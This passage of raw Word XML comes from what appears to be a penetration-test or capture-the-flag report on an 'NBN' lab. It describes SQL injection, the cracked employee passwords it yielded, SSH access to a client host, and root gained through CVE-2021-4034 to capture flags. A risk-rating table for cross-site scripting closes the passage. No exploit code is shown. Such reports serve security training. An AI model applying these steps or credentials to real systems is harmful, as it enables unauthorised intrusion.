                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Figure 5</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>: Cracking the Password of Stephenson</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC860B1" w14:textId="77777777" w:rsidR="00E247F9" w:rsidRDefault="00E247F9" w:rsidP="00E247F9">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08322804" w14:textId="77777777" w:rsidR="00E247F9" w:rsidRDefault="00E247F9" w:rsidP="00E247F9">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>The final cracked user credentials that were able to be retrieved via SQL injection were</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0735E066" w14:textId="77777777" w:rsidR="00E247F9" w:rsidRDefault="00E247F9" w:rsidP="00E247F9">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="19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07"/>
        <w:gridCol w:w="4118"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E247F9" w14:paraId="295A4346" w14:textId="77777777" w:rsidTr="003B2C88">
        <w:trPr>
          <w:trHeight w:val="285"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2107" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="000000" w:themeColor="text1"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="000000" w:themeColor="text1"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="000000" w:themeColor="text1"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
            <w:tcMar>
              <w:top w:w="15" w:type="dxa"/>
              <w:left w:w="15" w:type="dxa"/>
              <w:bottom w:w="15" w:type="dxa"/>
              <w:right w:w="15" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="38EE4C59" w14:textId="77777777" w:rsidR="00E247F9" w:rsidRDefault="00E247F9" w:rsidP="003B2C88">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Users</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4118" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="000000" w:themeColor="text1"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="000000" w:themeColor="text1"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000" w:themeColor="text1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
            <w:tcMar>
              <w:top w:w="15" w:type="dxa"/>
              <w:left w:w="15" w:type="dxa"/>
              <w:bottom w:w="15" w:type="dxa"/>
              <w:right w:w="15" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="28F3BB04" w14:textId="77777777" w:rsidR="00E247F9" w:rsidRDefault="00E247F9" w:rsidP="003B2C88">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E247F9" w14:paraId="74230B1E" w14:textId="77777777" w:rsidTr="003B2C88">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="21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 w:type="dxa"/>
              <w:bottom w:w="15" w:type="dxa"/>
              <w:right w:w="15" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="06D39E76" w14:textId="77777777" w:rsidR="00E247F9" w:rsidRDefault="00E247F9" w:rsidP="003B2C88">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>gibson</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="41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 w:type="dxa"/>
              <w:bottom w:w="15" w:type="dxa"/>
              <w:right w:w="15" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7F72DA06" w14:textId="77777777" w:rsidR="00E247F9" w:rsidRDefault="00E247F9" w:rsidP="003B2C88">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="C00000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
              </w:rPr>
              <w:t>digital</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E247F9" w14:paraId="4B7B855A" w14:textId="77777777" w:rsidTr="003B2C88">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="210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 w:type="dxa"/>
              <w:bottom w:w="15" w:type="dxa"/>
              <w:right w:w="15" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7F6E704F" w14:textId="77777777" w:rsidR="00E247F9" w:rsidRDefault="00E247F9" w:rsidP="003B2C88">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>stephenson</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="411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5" w:type="dxa"/>
              <w:left w:w="15" w:type="dxa"/>
              <w:bottom w:w="15" w:type="dxa"/>
              <w:right w:w="15" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4AD794FD" w14:textId="77777777" w:rsidR="00E247F9" w:rsidRDefault="00E247F9" w:rsidP="003B2C88">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="C00000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
              </w:rPr>
              <w:t>pizzadeliver</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5CB7A68F" w14:textId="77777777" w:rsidR="00E247F9" w:rsidRDefault="00E247F9" w:rsidP="00E247F9">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Table 1</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>: NBN Employee credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7DA620" w14:textId="77777777" w:rsidR="00E247F9" w:rsidRDefault="00E247F9" w:rsidP="00E247F9">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B5ADBDC" w14:textId="77777777" w:rsidR="00E247F9" w:rsidRDefault="00E247F9" w:rsidP="00E247F9">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>These credentials were used to successfully login into the employee login page in the production server and staging server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B176A3" w14:textId="77777777" w:rsidR="00E247F9" w:rsidRDefault="00E247F9" w:rsidP="00E247F9">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E2144BF" w14:textId="77777777" w:rsidR="00E247F9" w:rsidRDefault="00E247F9" w:rsidP="00E247F9">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26A457ED" wp14:editId="09CDF412">
            <wp:extent cx="5943600" cy="3752850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1203770910" name="Picture 12037709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0D574535" w14:textId="77777777" w:rsidR="00E247F9" w:rsidRDefault="00E247F9" w:rsidP="00E247F9">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6806B26E" w14:textId="77777777" w:rsidR="00E247F9" w:rsidRDefault="00E247F9" w:rsidP="00E247F9">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Figure 6</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>: Successful NBN Employee login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F81E4B" w14:textId="77777777" w:rsidR="00E247F9" w:rsidRDefault="00E247F9" w:rsidP="00E247F9"/>
    <w:p w14:paraId="26DDDE96" w14:textId="77777777" w:rsidR="00E247F9" w:rsidRDefault="00E247F9" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25A3050B" w14:textId="4E9FD7D9" w:rsidR="00220DD3" w:rsidRDefault="097002BE" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7ED8F6B4" wp14:editId="5DBBF31E">
            <wp:extent cx="4886325" cy="4676776"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="971311163" name="Picture 9713111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4676776"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CA8E4A" w14:textId="7B6BA402" w:rsidR="00220DD3" w:rsidRDefault="097002BE" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Figure 7</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>: Successful SSH connection onto nbnclient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189DCC24" w14:textId="15F16C1C" w:rsidR="00220DD3" w:rsidRDefault="00220DD3" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C754328" w14:textId="0C81DDC1" w:rsidR="00220DD3" w:rsidRDefault="097002BE" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Sensitive files were able to be accessed such was the flag7 file which was decoded to be </w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>flag7{worlds_within_worlds}.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F34B84" w14:textId="1FF42D50" w:rsidR="00220DD3" w:rsidRDefault="00220DD3" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E255014" w14:textId="5E632D85" w:rsidR="00220DD3" w:rsidRDefault="097002BE" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35EAA9E7" wp14:editId="2FB1EBEA">
            <wp:extent cx="2686050" cy="552450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="982303446" name="Picture 982303446"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86050" cy="552450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4271A16C" w14:textId="50353DE6" w:rsidR="00220DD3" w:rsidRDefault="097002BE" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Figure 7</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>: Decoded flag7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D146CED" w14:textId="5FA17B9A" w:rsidR="00220DD3" w:rsidRDefault="00220DD3" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C0AD454" w14:textId="22C2768D" w:rsidR="00220DD3" w:rsidRDefault="097002BE" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">The version of Linux was checked by running </w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>cat /etc/os-release.</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> The version of Linux was found to be </w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>18.04.4 LTS</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">. This version of Linux is still vulnerable to the same exploit that was </w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">used to gain root privileges in the webserver, </w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>CVE-2021-4034</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="25F2C2E0" w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> The exploit was uploaded to the client and exploited to gain root privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDF2E17" w14:textId="5B908B05" w:rsidR="00220DD3" w:rsidRDefault="00220DD3" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19B36580" w14:textId="5995F66E" w:rsidR="00220DD3" w:rsidRDefault="097002BE" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="292E9497" wp14:editId="78B0A5A2">
            <wp:extent cx="5943600" cy="3076575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1156109695" name="Picture 11561096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432230BA" w14:textId="05FC88A5" w:rsidR="00220DD3" w:rsidRDefault="097002BE" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Figure 8</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>: Escalating privilege on client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018C045C" w14:textId="2FEA4064" w:rsidR="00220DD3" w:rsidRDefault="00220DD3" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33E6232B" w14:textId="69329EDB" w:rsidR="00220DD3" w:rsidRDefault="097002BE" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Root was achieved and the NBN client and sensitive files such as flag8.txt was retrieved. The decoded hex string of flag8.txt was recorded to be </w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>flag8{escape_the_metaverse}.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CFD348" w14:textId="77777777" w:rsidR="00D57E0F" w:rsidRDefault="00D57E0F" w:rsidP="1D8F7EFF"/>
    <w:p w14:paraId="13EC8C4D" w14:textId="5901801D" w:rsidR="00D57E0F" w:rsidRDefault="00B94233" w:rsidP="00D57E0F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc153834529"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00D57E0F" w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="00D57E0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cross Site Scripting</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
      <w:r w:rsidR="00D57E0F" w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w: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D57E0F" w14:paraId="4707AE59" w14:textId="77777777" w:rsidTr="003B2C88">
        <w:trPr>
          <w:trHeight w:val="227"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="935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Pr>
          <w:p w14:paraId="74CF128D" w14:textId="60AFF669" w:rsidR="00D57E0F" w:rsidRDefault="00D57E0F" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>HIGH RISK (</w:t>
            </w:r>
            <w:r w:rsidR="00201CBD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>/10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D57E0F" w14:paraId="7B44C86A" w14:textId="77777777" w:rsidTr="000A151E">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3014" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6"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CB86161" w14:textId="77777777" w:rsidR="00D57E0F" w:rsidRDefault="00D57E0F" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Exploitation Likelihood</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6345" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6"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87C7FF0" w14:textId="288FA423" w:rsidR="00D57E0F" w:rsidRDefault="000A151E" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Minor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D57E0F" w14:paraId="137221BB" w14:textId="77777777" w:rsidTr="000A151E">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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8C98D7C" w14:textId="77777777" w:rsidR="00D57E0F" w:rsidRDefault="00D57E0F" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Business Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="63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07459502" w14:textId="77777777" w:rsidR="00D57E0F" w:rsidRDefault="00D57E0F" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D57E0F" w14:paraId="464AB309" w14:textId="77777777" w:rsidTr="000A151E">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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C84B8A9" w14:textId="77777777" w:rsidR="00D57E0F" w:rsidRDefault="00D57E0F" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Remediation Difficulty</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="63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AACE7F0" w14:textId="77777777" w:rsidR="00D57E0F" w:rsidRDefault="00D57E0F" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Easy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3AC339BC" w14:textId="77777777" w:rsidR="00D57E0F" w:rsidRDefault="00D57E0F" w:rsidP="00D57E0F"/>
